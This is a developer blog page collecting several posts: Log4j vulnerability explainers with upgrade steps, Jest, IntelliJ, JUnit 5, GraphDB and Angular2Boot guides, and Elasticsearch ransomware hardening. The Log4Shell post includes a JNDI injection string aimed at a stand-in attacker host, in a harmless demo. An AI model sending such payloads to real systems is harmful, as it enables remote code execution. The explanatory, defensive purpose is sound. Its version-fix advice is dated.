Category: Developer Productivity and Hacks

Efficiency tips, tools, and tricks that take the pain out of coding. From IDE extensions to debugging wizardry, these posts will help you ship better code faster—and have fun while doing it.

  • Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know

    Apache Log4j 2.16.0 Is Now Available – Critical Update Required

    A follow-on vulnerability in Log4j, CVE-2021-45046, has been discovered and fixed in version 2.16.0. It stems from an incomplete fix for the original CVE-2021-44228. If you’re still using version 2.15.0 or earlier, your applications may remain vulnerable in certain non-default configurations.

    This is a follow-on from my previous post: Log4J Zero-Day Exploit: Explained with Fixes.

    Here’s why this update is critical and what you need to do.

    TL;DR

    If you’re short on time, here’s the gist:

    • Upgrade your Log4j library to version 2.16.0 immediately.
    • The newer version completely removes the risky message lookup feature, which was the critical enabler of these exploits.
    • Visit the Apache Security Page for the latest updates

    Why Version 2.15.0 Isn’t Enough

    While version 2.15.0 addressed initial vulnerabilities, it left certain configurations exposed. Specifically, using the Thread Context value in the log message Pattern Layout could still allow exploitation. Version 2.16.0 eliminates this risk by fully removing the message lookup functionality.
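    To make the residual risk concrete, the exposed setup looks roughly like this (a hypothetical log4j2.xml fragment; the `loginId` key is illustrative):

    ```xml
    <!-- Non-default pattern that embeds a Thread Context lookup.        -->
    <!-- On 2.15.0, attacker-controlled Thread Context values reaching   -->
    <!-- this lookup could still be exploited; 2.16.0 removes message    -->
    <!-- lookup support entirely.                                        -->
    <PatternLayout pattern="%d %p %c - login=$${ctx:loginId} %m%n"/>
    ```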

    Misleading Fixes to Avoid

    Not all solutions floating around the community are effective. Avoid relying on the following:

    • Updating just the Java version.
    • Filtering vulnerabilities using Web Application Firewalls (WAF).
    • Modifying the log statement format to %m{nolookups}.

    These approaches won’t fully mitigate the vulnerabilities, so upgrading to version 2.16.0 is your safest bet.

    How to Stay Updated

    The Log4j exploit has drawn global attention, leading to a flood of information—some of which may be inaccurate. For reliable updates, stick to trusted sources:

    What’s Next?

    This is an evolving situation, and further updates may arise. Bookmark the Apache Security Page and regularly check for announcements to stay ahead of potential risks.

  • Log4J Zero-Day Exploit: Explained with Fixes

    Note: Check out my latest blog for updated information and solutions on this issue: Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know

    The best evidence I have seen so far is a Little Bobby Tables-style exploit spotted on LinkedIn 🫣

    Overview: What Is the Log4J Zero-Day Exploit (CVE-2021-44228)?

    A critical zero-day exploit affecting the widely used Log4J library has been identified and fixed in version 2.15.0. This vulnerability (CVE-2021-44228) allows attackers to gain complete control of your server remotely—making it one of the most dangerous Java-based vulnerabilities to date.

    For details, visit the Apache Log4j Security Page. This isn’t just a Java developer’s headache—it’s a wake-up call for every engineer, security specialist, and even non-Java tech teams whose tools rely on Log4J indirectly (looking at you, Elasticsearch and Atlassian users).

    This post explains:

    1. How the exploit works.
    2. How to check if you’re affected.
    3. Step-by-step fixes to secure your applications.

    Quick Summary

    • Upgrade Log4J to version 2.15.0 or later immediately.
    • Workarounds exist for systems where upgrading isn’t feasible (see below).
    • Popular apps like Elasticsearch, Minecraft, and Jira are affected.

    Understanding the Exploit

    The vulnerability lies in log4j-core versions 2.0-beta9 to 2.14.1. When an application logs user inputs using Log4J, the exploit allows malicious actors to execute arbitrary code remotely. In practical terms, if your app takes user input and logs it, you’re at risk.
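    To see why merely logging user input is enough, here is a toy sketch of the lookup mechanism (illustrative only; this is not Log4j’s actual code, and the class and payload below are made up). Vulnerable versions scanned each log message for `${...}` directives and resolved them, so a `${jndi:...}` directive inside user input made the logger itself dereference an attacker-controlled address:

    ```java
    // Toy model of message-lookup expansion (illustrative, not Log4j code).
    public class LookupDemo {
        static String expand(String message) {
            int start = message.indexOf("${");
            int end = message.indexOf('}', start + 2);
            if (start < 0 || end < 0) {
                return message; // no directive: logged as-is
            }
            String directive = message.substring(start + 2, end);
            // Real Log4j dispatched on the prefix: jndi:, env:, ctx:, ...
            if (directive.startsWith("jndi:")) {
                // The real resolver would fetch (and potentially execute)
                // remote content from this attacker-controlled address.
                return "<would dereference " + directive.substring(5) + ">";
            }
            return message;
        }

        public static void main(String[] args) {
            // A "username" copied straight from an HTTP header into a log call:
            System.out.println(expand("${jndi:ldap://attacker.example/a}"));
            System.out.println(expand("plain old log message"));
        }
    }
    ```

    On patched versions (2.16.0 and later) message lookups are removed entirely, so a payload like the one above is logged as literal text.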

    Am I Affected?

    If your system runs Java and incorporates log4j-core, either directly or through dependencies, assume you’re affected. Use tools like Maven or Gradle to identify the versions in your project. Here’s how:

    For Gradle

    ./gradlew dependencies | grep "log4j"

    For Maven

    mvn dependency:tree | grep log4j

    Most Java applications log user inputs, making this a near-universal issue. Be proactive and investigate now.

    How to Fix the Log4J Vulnerability

    1. Upgrade Your Log4J Version

    The most reliable solution is upgrading to Log4J 2.15.0 or newer. Here’s how for common tools:

    Maven

    <properties>
      <log4j2.version>2.15.0</log4j2.version>
    </properties>

    Then verify the fix with

    mvn dependency:list | grep log4j

    Gradle

    implementation(platform("org.apache.logging.log4j:log4j-bom:2.15.0"))

    Then confirm the version fix with

    ./gradlew dependencyInsight --dependency log4j-core

    2. Workarounds If Upgrading Isn’t Feasible

    For systems running Log4J 2.10 or later, use these temporary fixes:

    Add the system property:

    -Dlog4j2.formatMsgNoLookups=true

    Set the environment variable

    LOG4J_FORMAT_MSG_NO_LOOKUPS=true

    For JVM-based apps, modify the launch command

    java -Dlog4j2.formatMsgNoLookups=true -jar myapplication.jar

    Applications Known to Be Affected

    Even if you’re not directly using Log4J, many popular tools and libraries depend on it. Here’s a (non-exhaustive) list of systems at risk:

    • Libraries: Spring Boot, Struts
    • Applications: Elasticsearch, Kafka, Solr, Jira, Confluence, Logstash, Minecraft
    • Services: Steam, Apple iCloud

    If you’re using any of these, check their documentation for specific patches or updates.

    Final Reminder: Why This Matters

    Apache has rated this vulnerability as critical. Exploiting it allows remote attackers to execute arbitrary code as the server user, potentially with root access. Worm-like attacks that propagate automatically are possible.

    To stay secure:

    1. Upgrade or apply workarounds immediately.
    2. Regularly monitor the Apache Log4j Security Page for updates.

    Additional Resources

  • How to Configure Jest for TypeScript in React or NodeJS Projects

    Setting up Jest for TypeScript testing in React and NodeJS can streamline your development workflow and ensure high-quality code. This guide provides an opinionated, step-by-step process for configuring Jest with TypeScript support, whether you’re working on new or existing projects.

    1. Install Jest and Its Friends (Dependencies)

    Start by installing the necessary Jest packages along with TypeScript support:

    # Using Yarn
    yarn add --dev jest ts-jest @types/jest
    
    # Or using npm
    npm install --save-dev jest ts-jest @types/jest

    • ts-jest: A TypeScript preprocessor that lets Jest compile and run .ts and .tsx files.
    • @types/jest: Provides type definitions for Jest in TypeScript.

    2. Configure Jest with the Preprocessor

    Generate a basic Jest configuration using ts-jest:

    npx ts-jest config:init

    This command generates a jest.config.js file with the following contents:

    module.exports = {
      preset: 'ts-jest',
      testEnvironment: 'node',
    };

    3. Customize Your Jest Configuration (Optional)

    For advanced setups, you can extend your configuration to include code coverage and improved testing workflows:

    module.exports = {
      roots: ['<rootDir>/src'],
      preset: 'ts-jest',
      testEnvironment: 'node',
      coverageDirectory: 'coverage',
      verbose: true,
      collectCoverage: true,
      coverageThreshold: {
        global: {
          branches: 90,
          functions: 95,
          lines: 95,
          statements: 90,
        },
      },
      collectCoverageFrom: ['**/*.{ts,tsx}'],
      coveragePathIgnorePatterns: ['/node_modules/'],
      coverageReporters: ['json', 'lcov', 'text', 'clover'],
    }; 

    This configuration adds:

    • Code coverage thresholds to ensure high-quality tests.
    • A custom coverage directory.
    • Coverage collection from TypeScript (.ts) and TSX (.tsx) files.

    For more advanced configurations, check the official Jest documentation.

    4. Add Jest Test Scripts to package.json

    Add custom scripts for testing workflows in your package.json file:

    {
      "scripts": {
        "test": "jest --coverage",
        "test:watch": "jest --watchAll",
        "test:nocoverage": "jest --watchAll --no-coverage"
      }
    }

    These scripts provide:

    • test: Runs all tests with coverage reports.
    • test:watch: Watches for changes and re-runs tests automatically.
    • test:nocoverage: Faster test runs without generating coverage reports.

    Congratulations if you got this far. This is a one-off setup; you will reap the benefits in the days to come. Read on to verify your Jest configuration for your TypeScript React or NodeJS project.

    5. Verify the Setup with a Simple Test

    Create a simple function and its corresponding test file to confirm everything is configured correctly.

    Function (sum.ts):

    const sum = (a: number, b: number): number => a + b;
    export default sum;

    Test (sum.test.ts):

    import sum from './sum';
    
    describe('Addition function', () => {
      test('adds 1 + 2 to equal 3', () => {
        expect(sum(1, 2)).toBe(3);
      });
    });

    Run the test:

    yarn test

    6. Advanced Testing Workflow with Coverage Reports

    After running your tests, generate coverage reports for better visibility into untested areas of your codebase.

    Commands

    yarn test               # Runs tests with coverage
    yarn test:watch         # Continuously watches and runs tests
    yarn test:nocoverage    # Faster feedback without coverage
    yarn global add serve   # Install `serve` to view reports
    yarn view:coverage      # Open the coverage reports as a static site

    Example Test Outputs

    When running yarn test, you may see:

    Failing test example: `yarn test` console output with a failing test (screenshot).

    Passing test example: `yarn test` console output with a passing test (screenshot).

    Now, fix any failing tests, and re-run the commands until all tests pass successfully.

    Why This Setup is Worth It

    This one-time Jest configuration significantly speeds up your TypeScript testing workflow. With proper coverage thresholds, easy-to-run scripts, and a reliable test runner like Jest, you’ll save time while improving your project’s overall quality.

    If you would like additional guidance, please take a look at the official Jest configuration guide.

    Furthermore, you can configure your IDE to generate boilerplate code snippets using this guide: React Code Snippet Generators with IntelliJ IDEA

  • Boosting React Development with IntelliJ IDEA Code Snippets

    If you’re a fan of automation (and who isn’t?), IntelliJ IDEA’s code snippets are a game-changer for React development. As a Java developer diving into React, I’ve found these snippets invaluable for reducing typos, boilerplate, and the dreaded RSI (Repetitive Strain Injury). This guide walks you through generating React components using IntelliJ IDEA’s live templates, saving you time and effort.

    How to Generate Snippets in IntelliJ IDEA

    Before we go any further, here is how to generate a code snippet in IntelliJ IDEA:

    • Type the abbreviation of the required snippet in the target file and press Tab.
    • You can narrow IntelliJ IDEA’s list of suggestions by typing more characters of the abbreviation.

    Example: shortcuts to create snippets in IntelliJ IDEA on a Mac:

    React code snippets generator in IntelliJ IDEA (screenshot)
    1. Type `rccp` in your editor.
    2. Then press Tab to generate.

    Note:

    • The component name is taken from the file name, for example “ManageCoursePage.js”.
    • On Visual Studio Code, similar React code generation is available via the TypeScript React Code Snippet Extension.

    React Code Snippet Examples

    1. React Component Class with PropTypes

    Abbreviation: rcp
    Steps:

    1. Type rcp in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    import PropTypes from 'prop-types';
    
    class ManageCoursePage extends Component {
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    ManageCoursePage.propTypes = {};
    export default ManageCoursePage; 

    2. React Component Class with ES6 Module System

    Abbreviation: rcc
    Steps:

    1. Type rcc in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    
    class ManageCoursePage extends Component {
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    export default ManageCoursePage;

    3. React Component Class Connected to Redux with Dispatch

    Abbreviation: rdc
    Steps:

    1. Type rdc in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    import { connect } from 'react-redux';
    
    function mapStateToProps(state) {
      return {};
    }
    
    function mapDispatchToProps(dispatch) {
      return {};
    }
    
    class ManageCoursePage extends Component {
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    export default connect(mapStateToProps, mapDispatchToProps)(ManageCoursePage); 

    4. React Component Class with PropTypes and Lifecycle Methods

    Abbreviation: rcfc
    Steps:

    1. Type rcfc in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    import PropTypes from 'prop-types';
    
    class ManageCoursePage extends Component {
      constructor(props) {
        super(props);
      }
    
      componentWillMount() {}
    
      componentDidMount() {}
    
      componentWillReceiveProps(nextProps) {}
    
      shouldComponentUpdate(nextProps, nextState) {
        return true;
      }
    
      componentWillUpdate(nextProps, nextState) {}
    
      componentDidUpdate(prevProps, prevState) {}
    
      componentWillUnmount() {}
    
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    ManageCoursePage.propTypes = {};
    export default ManageCoursePage; 

    Customising IntelliJ Snippets

    React code snippets in IntelliJ IDEA: the live template management view (screenshot)

    To create or modify snippets in IntelliJ IDEA:

    1. Open Preferences > Editor > Live Templates.
    2. Add new templates or tweak existing ones to match your development style.

    These templates can also be shared across teams to maintain consistency and reduce onboarding time.
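    As a concrete example, a custom live template body for a small functional component might look like this (`$NAME$` and `$END$` are IntelliJ template variables; the abbreviation you bind it to is up to you):

    ```
    import React from 'react';

    const $NAME$ = () => {
      return <div>$END$</div>;
    };

    export default $NAME$;
    ```

    Bind `$NAME$` to the `fileNameWithoutExtension()` expression in the template editor so the component is named after the file, matching the behaviour of the built-in snippets above.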

    Congratulations! You’ve successfully set up Jest for TypeScript testing in React and NodeJS and integrated IntelliJ IDEA snippets to 10x your workflow. Now there are no excuses not to follow a test-driven (TDD), automated-testing approach, which leads to faster development and more confidence in shipping frequently.

    Conclusion

    IntelliJ IDEA snippets are a fantastic way to save time and reduce errors when working with React. Whether you’re generating PropTypes, lifecycle methods, or Redux-connected components, these templates make development faster and less repetitive. Explore IntelliJ’s live template feature to customise your workflow and share these snippets with your team for maximum efficiency.

    For more automation tips, check out IntelliJ IDEA’s documentation on live templates.

    For more resources

  • Upgrading from JUnit 4 to JUnit 5 in Spring Boot Applications

    Migrating from JUnit 4 to JUnit 5 (Jupiter) can feel daunting, especially if your project is built on older versions of Spring Boot. This guide breaks down the process step-by-step, helping you navigate dependency adjustments, IDE tweaks, and annotation replacements.

    Prerequisite: Spring Boot Compatibility

    Before starting, note that the SpringExtension required for JUnit 5 is only available starting from Spring 5. Unfortunately, spring-boot-starter-test 1.5.x is based on Spring 4, meaning JUnit 5 isn’t natively supported until you upgrade to Spring Boot 2.x or later.

    For more details, check:

    Step 1: Adjust Dependencies

    To use JUnit 5 in a Spring Boot project, you’ll need to exclude the default JUnit 4 dependency and explicitly add JUnit 5 dependencies.

    Current Dependency Configuration (JUnit 4)

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-test</artifactId>
        <scope>test</scope>
    </dependency> 

    Updated Dependency Configuration (JUnit 5)

    Exclude JUnit 4 and add JUnit 5 dependencies:

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-test</artifactId>
        <scope>test</scope>
        <exclusions>
            <exclusion>
                <groupId>junit</groupId>
                <artifactId>junit</artifactId>
            </exclusion>
        </exclusions>
    </dependency>
    <dependency>
        <groupId>org.junit.jupiter</groupId>
        <artifactId>junit-jupiter</artifactId>
        <scope>test</scope>
    </dependency> 

    Step 2: Update Imports

    With JUnit 5, most of the imports and annotations from JUnit 4 have been replaced. Use your IDE to quickly update these references.

    Global Find and Replace:

    1. Replace Imports
      • import org.junit.Test
        • import org.junit.jupiter.api.Test
      • import org.junit.runner.RunWith
        • import org.junit.jupiter.api.extension.ExtendWith
      • import org.springframework.test.context.junit4.SpringRunner
        • import org.springframework.test.context.junit.jupiter.SpringExtension
    2. Replace Annotations
      • @RunWith(SpringRunner.class)
        • @ExtendWith(SpringExtension.class)

    Step 3: Replace Annotations in Test Classes

    After updating imports, your test classes need to use JUnit 5’s new annotations.

    Before (JUnit 4)

    import org.junit.Test;
    import org.junit.runner.RunWith;
    import org.springframework.test.context.junit4.SpringRunner;
    
    @RunWith(SpringRunner.class)
    public class ExampleTest {
        @Test
        public void shouldPass() {
            // test logic
        }
    } 

    After (JUnit 5)

    import org.junit.jupiter.api.Test;
    import org.junit.jupiter.api.extension.ExtendWith;
    import org.springframework.test.context.junit.jupiter.SpringExtension;
    
    @ExtendWith(SpringExtension.class)
    public class ExampleTest {
        @Test
        public void shouldPass() {
            // test logic
        }
    } 

    Step 4: Use IDE Features for Dependency Updates

    Adding JUnit 5 to the classpath (screenshot)

    If you’re using IntelliJ IDEA or similar IDEs, enable dependency management features to simplify updating your pom.xml. Use the following snippets if you prefer manual configuration:

    <dependency>
        <groupId>org.junit.jupiter</groupId>
        <artifactId>junit-jupiter-api</artifactId>
        <scope>test</scope>
    </dependency> 

    Why Upgrade to JUnit 5?

    JUnit 5 offers several advantages over JUnit 4, including:

    • Better modularity: You can use only the features you need.
    • New annotations: More flexibility with @BeforeEach, @AfterEach, and others.
    • Parameter injection: Cleaner test code through parameterized tests.
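    As a quick taste of parameterized tests, here is a sketch (it assumes the `junit-jupiter` aggregate dependency from Step 1, which bundles the `junit-jupiter-params` module; the class and values are illustrative):

    ```java
    import org.junit.jupiter.params.ParameterizedTest;
    import org.junit.jupiter.params.provider.CsvSource;
    import static org.junit.jupiter.api.Assertions.assertEquals;

    class AdditionTest {

        // One test method, three cases: operands a and b, and the expected sum.
        @ParameterizedTest
        @CsvSource({"1, 2, 3", "2, 3, 5", "-1, 1, 0"})
        void addsOperands(int a, int b, int expected) {
            assertEquals(expected, a + b);
        }
    }
    ```

    With JUnit 4 this would have required a separate `@RunWith(Parameterized.class)` runner class; in JUnit 5 it is just another annotated test method.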

    Conclusion

    Upgrading from JUnit 4 to JUnit 5 in Spring Boot applications ensures your project stays up-to-date with modern testing frameworks. For more customisation, you can explore the official JUnit 5 documentation.

    Let me know how the migration process goes, and happy testing!

  • GraphDB Connectors with Elasticsearch: Semantic Search Made Powerful

    GraphDB connectors allow you to leverage Elasticsearch’s full-text search capabilities for enhanced semantic search. In this guide, we’ll configure a GraphDB connector for Elasticsearch, execute SPARQL queries, and demonstrate debugging techniques to ensure seamless integration.

    Pre-requisites

    Before diving into the setup, ensure the following are in place:

    GraphDB locations and repository configuration (screenshot)
    1. GraphDB Installation: Ensure you have an installed instance of GraphDB (Enterprise edition is required for connectors).
    2. Elasticsearch Installation: Install and configure Elasticsearch with the following:
      • Port 9300 must be open and running (configured in /config/elasticsearch.yml or through Puppet/Chef).
      • If using Vagrant, ensure ports 9200, 9300, and 12055 are forwarded to your host.

    Step 1: Prepare GraphDB

    1. Set up your GraphDB instance.
    2. Specify your repository and write data to it.

    Step 2: Create Elasticsearch Connector

    To create a connector, follow these steps:

    1. Navigate to the SPARQL tab in GraphDB.

    2. Insert the following query and click Run:

      SPARQL Query:

      PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
      PREFIX inst: <http://www.ontotext.com/instance/>
      
      INSERT DATA {
        inst:my_index :createConnector '''
        {
          "elasticsearchCluster": "vagrant",
          "elasticsearchNode": "localhost:9300",
          "types": ["http://www.ontotext.com/example/wine#Wine"],
          "fields": [
            {"fieldName": "grape", "propertyChain": ["http://www.ontotext.com/example/wine#madeFromGrape"]},
            {"fieldName": "sugar", "propertyChain": ["http://www.ontotext.com/example/wine#hasSugar"], "orderBy": true},
            {"fieldName": "year", "propertyChain": ["http://www.ontotext.com/example/wine#hasYear"]}
          ]
        }
        ''' .
      }
      

    3. Confirm the new connector in Elasticsearch by verifying the creation of my_index (it will be empty initially).

    4. Debug the connector using these queries to check for connectivity and status:

      List Connectors:

      PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
      
      SELECT ?cntUri ?cntStr {
        ?cntUri :listConnectors ?cntStr .
      }

      Check Connector Status:

      PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
      
      SELECT ?cntUri ?cntStatus {
        ?cntUri :connectorStatus ?cntStatus .
      }

    Step 3: Insert Data into GraphDB

    Ensure your connector listens for data changes by inserting, updating, or syncing data with the corresponding Elasticsearch copy. Use the following data insertion example:

    Data Insertion (Turtle):

      @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
      @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
      @prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
      @prefix : <http://www.ontotext.com/example/wine#> .
      
      :RedWine rdfs:subClassOf :Wine .
      :WhiteWine rdfs:subClassOf :Wine .
      :RoseWine rdfs:subClassOf :Wine .
      
      :Merlo rdf:type :Grape ; rdfs:label "Merlo" .
      :CabernetSauvignon rdf:type :Grape ; rdfs:label "Cabernet Sauvignon" .
      :CabernetFranc rdf:type :Grape ; rdfs:label "Cabernet Franc" .
      :PinotNoir rdf:type :Grape ; rdfs:label "Pinot Noir" .
      
      :Yoyowine rdf:type :RedWine ;
        :madeFromGrape :CabernetSauvignon ;
        :hasSugar "dry" ;
        :hasYear "2013"^^xsd:integer . 

    Debugging Tips

    1. Use the SPARQL queries above to validate your setup.
    2. Ensure Elasticsearch logs show successful connector interactions.
    3. Check that my_index in Elasticsearch reflects the inserted data from GraphDB.

    Conclusion

    Configuring GraphDB connectors with Elasticsearch allows you to combine semantic search sophistication with Elasticsearch’s robust full-text search capabilities. This integration unlocks advanced search and analytics for your data. Use the steps and SPARQL queries above to ensure a seamless setup.

    For more insights, explore the GraphDB documentation and Elasticsearch official guide.

  • TypeScript is Great, But Sometimes You Just Want Java

      TypeScript has become the de facto language for Angular development, and for good reason—it’s easy to learn, strongly typed, and less error-prone than JavaScript. But what if you prefer Java for its mature tooling, strong object-oriented features, and familiarity? Enter Angular2Boot—a framework built on Angular 2, GWT, and Spring Boot that lets you write Angular 2 apps in Java 8.

      This guide walks you through setting up and running an Angular 2 app in Java 8 using Angular2Boot.

      Why Angular2Boot?

      Angular2Boot bridges the gap between modern frontend development and Java’s robust backend ecosystem. It’s particularly useful for smaller applications where splitting the app into multiple tiers (WebClient, Service, Backend REST API) might feel like overkill.

      Key Benefits

      1. Stronger Typing: Java provides even stronger type-checking compared to TypeScript.
      2. Mature Tooling: Java offers tried-and-tested tools and IDEs for streamlined development.
      3. Simplified Deployment: Package everything into one Spring Boot jar for production-ready builds.
      4. Robustness: Java remains a go-to language for building scalable, enterprise-grade applications.

      Getting Started with Angular2Boot

      Step 1: Create the Project

      Generate an Angular and GWT app using Maven archetype:

      mvn archetype:generate \
        -DarchetypeGroupId=fr.lteconsulting \
        -DarchetypeArtifactId=angular2-gwt.archetype \
        -DarchetypeVersion=1.6

      During the setup process, provide the following details:

      • Group ID: com.mosesmansaray.play
      • Artifact ID: angular-gwt-in-java8-example
      • Version: 1.0-SNAPSHOT
      • Package Name: com.mosesmansaray.play

      This will create a project scaffold with all the necessary dependencies and configurations.

      Step 2: Install Dependencies

      Build the project to install all required dependencies and produce an executable JAR file:

      mvn clean install

      The resulting JAR file will be located in your target folder:

      /angular-gwt-in-java8-example/target/angular-gwt-in-java8-example-1.0-SNAPSHOT.jar
      

      Step 3: Run the Application

      Run the fat JAR file to start your application:

      java -jar target/angular-gwt-in-java8-example-1.0-SNAPSHOT.jar
      

      Step 4: Development with Live Reload

      During development, you can enable live reload for both backend and frontend:

      Backend:

      mvn spring-boot:run

      Frontend:

      mvn gwt:run-codeserver

      This ensures a seamless development workflow with real-time updates.


      Resources for Further Exploration

      1. Library Source Code: Explore the codebase.
      2. GWT con 2016 Talk: Watch here
      3. Speaker Deck Slides: A great overview of Angular2Boot.
      4. Code Demos:

      Conclusion

      Angular2Boot allows developers to harness the power of Angular 2 while benefiting from Java’s strong typing, mature tooling, and simplified deployment. Brilliant for when you’re prototyping or building enterprise-grade systems, Angular2Boot bridges the gap between modern frontend frameworks and Java’s backend ecosystem.

      Try it and experience the best of both worlds! Let me know what you think.

  • Elasticsearch Ransomware: A Wake-Up Call for Admins

      By now, we’ve all seen this coming. With MongoDB falling victim to ransomware attacks, other NoSQL technologies like Elasticsearch were bound to follow. The alarming truth? Many Elasticsearch clusters are still open to the internet, vulnerable to attackers exploiting weak security practices, default configurations, and exposed ports.

      This guide covers essential steps to protect your Elasticsearch cluster from becoming the next target.

      TL;DR: Essential Security Measures

      1. Use X-Pack Security: If possible, implement Elastic’s built-in security features.
      2. Do Not Expose Your Cluster to the Internet: Keep your cluster isolated from public access.
      3. Avoid Default Configurations: Change default ports and settings to reduce predictability.
      4. Disable HTTP Access: If not required, disable HTTP access to limit attack vectors.
      5. Use a Firewall or Reverse Proxy: Implement security layers like Nginx, VPN, or firewalls (example Nginx config).
      6. Disable Scripts: Turn off scripting unless absolutely necessary.
      7. Regular Backups: Use tools like Curator to back up your data regularly.

      The Ransomware Playbook

      Ransomware attackers are targeting Elasticsearch clusters, wiping out data, and leaving ransom notes like this:

      “Send 0.2 BTC (bitcoin) to this wallet xxxxxxxxxxxxxx234235xxxxxx343xxxx if you want to recover your database! Send your service IP to this email after payment: xxxxxxx@xxxxxxx.org.”

      Their method is straightforward:

      • Target: Internet-facing clusters with poor configurations.
      • Exploit: Clusters with no authentication, default ports, and exposed HTTP.
      • Action: Wipe the cluster clean and demand payment.

      Why Are Clusters Vulnerable?

      Many Elasticsearch admins overlook basic security practices, leaving clusters open to the internet without authentication or firewall protection. Even clusters with security measures are often left with weak passwords, exposed ports, and unnecessary HTTP enabled.

      The lesson? Default settings are dangerous. Attackers are actively scanning for such vulnerabilities.

      How to Protect Your Elasticsearch Cluster

      1. Use Elastic’s X-Pack Security

      X-Pack, Elastic’s security plugin, provides out-of-the-box protection with features like:

      • User authentication and role-based access control (RBAC).
      • Encrypted communication.
      • Audit logging.

      If you’re using Elastic Cloud, these protections are enabled by default.

      2. Avoid Exposing Your Cluster to the Internet

      Isolate your cluster from public access:

      • Use private IPs or a Virtual Private Network (VPN).
      • Block all inbound traffic except trusted sources.

      3. Change Default Ports and Configurations

      Avoid predictability by changing Elasticsearch’s default port (9200) and disabling unnecessary features like HTTP if they aren’t required.
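      For example, in elasticsearch.yml (hypothetical values; pick settings that fit your own network):

      ```yaml
      # Bind to a private interface rather than all interfaces.
      network.host: 127.0.0.1
      # Move HTTP off the well-known default port 9200.
      http.port: 9215
      ```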

      4. Implement Firewalls and Reverse Proxies

      Add security layers between your cluster and potential attackers:

      • Use a reverse proxy like Nginx or Apache.
      • Configure firewall rules to allow only trusted IPs.
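      A minimal sketch of such a layer (hypothetical Nginx config; the host name, trusted network, and htpasswd path are placeholders):

      ```nginx
      server {
          listen 8080;
          server_name search.internal.example;

          # Only the trusted network may reach the cluster.
          allow 10.0.0.0/8;
          deny  all;

          # Basic authentication in front of Elasticsearch.
          auth_basic           "Restricted";
          auth_basic_user_file /etc/nginx/.htpasswd;

          location / {
              proxy_pass http://127.0.0.1:9200;
          }
      }
      ```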

      5. Disable Scripting

      Unless absolutely necessary, disable Elasticsearch’s scripting capabilities to minimize attack surfaces. You can disable scripts in the elasticsearch.yml configuration file:

      script.allowed_types: none

      6. Regular Backups with Curator

      Data loss is inevitable without backups. Use tools like Elasticsearch Curator to regularly back up your data. Store snapshots in a secure, offsite location.
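      Under the hood, Curator drives Elasticsearch’s snapshot API; the raw requests look like this (the repository name and filesystem path are hypothetical, and the location must be whitelisted via `path.repo`):

      ```
      PUT /_snapshot/my_backup
      {
        "type": "fs",
        "settings": {
          "location": "/mnt/backups/elasticsearch"
        }
      }

      PUT /_snapshot/my_backup/snapshot_1?wait_for_completion=true
      ```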

      Additional Resources

      Closing Thoughts

      Elasticsearch ransomware attacks are a stark reminder of the importance of proactive security measures. Whether you’re hosting your cluster on Elastic Cloud or self-managing it, adopting the security best practices outlined here will safeguard your data from malicious actors.

      Remember:

      • Change default configurations.
      • Isolate your cluster from the internet.
      • Regularly back up your data.

      If your Elasticsearch cluster is unprotected, the time to act is now—don’t wait until it’s too late.

    3. Cleaning Elasticsearch Data Before Indexing

      Cleaning Elasticsearch Data Before Indexing

      When dealing with Elasticsearch, sometimes you can’t control the format of incoming data. For instance, HTML tags may slip into your Elasticsearch index, creating unintended or unpredictable search results.

      Example Scenario:
      Consider the following HTML snippet indexed into Elasticsearch:

      <a href="http://somedomain.com">website</a>

      A search for somedomain might match the above link 🫣, but users rarely expect that. To avoid such issues, use a custom analyzer to clean the data before indexing. This guide shows you how to clean and debug Elasticsearch data effectively.

      Step 1: Create a New Index with HTML Strip Mapping

      Create a new index with a custom analyzer that uses the html_strip character filter to clean your data.

      PUT Request:

      PUT /html_poc_v3
      {
        "settings": {
          "analysis": {
            "analyzer": {
              "my_html_analyzer": {
                "type": "custom",
                "tokenizer": "standard",
                "char_filter": ["html_strip"]
              }
            }
          }
        },
        "mappings": {
          "html_poc_type": {
            "properties": {
              "body": {
                "type": "string",
                "analyzer": "my_html_analyzer"
              },
              "description": {
                "type": "string",
                "analyzer": "standard"
              },
              "title": {
                "type": "string",
                "analyzer": "my_html_analyzer"
              },
              "urlTitle": {
                "type": "string"
              }
            }
          }
        }
      }
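      Before indexing anything, you can sanity-check the analyzer directly with the _analyze API. The query-string form below matches the older Elasticsearch versions this mapping syntax targets (remember to URL-encode the text in a real request); the response should contain only the visible tokens, Some and website, with all markup stripped:

      ```
      GET /html_poc_v3/_analyze?analyzer=my_html_analyzer&text=<p>Some <a href="http://somedomain.com">website</a></p>
      ```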

      Step 2: Post Sample Data

      Add some sample data to the newly created index to test the analyzer.

      POST Request:

      POST /html_poc_v3/html_poc_type/02
      {
        "description": "Description <p>Some déjà vu <a href=\"http://somedomain.com\">website</a>",
        "title": "Title <p>Some déjà vu <a href=\"http://somedomain.com\">website</a>",
        "body": "Body <p>Some déjà vu <a href=\"http://somedomain.com\">website</a>"
      } 

      Step 3: Retrieve Indexed Data

      To inspect the cleaned data, use the _search API with custom script fields, which bypass the stored _source and return the terms actually held in the index.

      GET Request:

      GET /html_poc_v3/html_poc_type/_search?pretty=true
      {
        "query": {
          "match_all": {}
        },
        "script_fields": {
          "title": {
            "script": "doc[field].values",
            "params": {
              "field": "title"
            }
          },
          "description": {
            "script": "doc[field].values",
            "params": {
              "field": "description"
            }
          },
          "body": {
            "script": "doc[field].values",
            "params": {
              "field": "body"
            }
          }
        }
      }

      Example Response

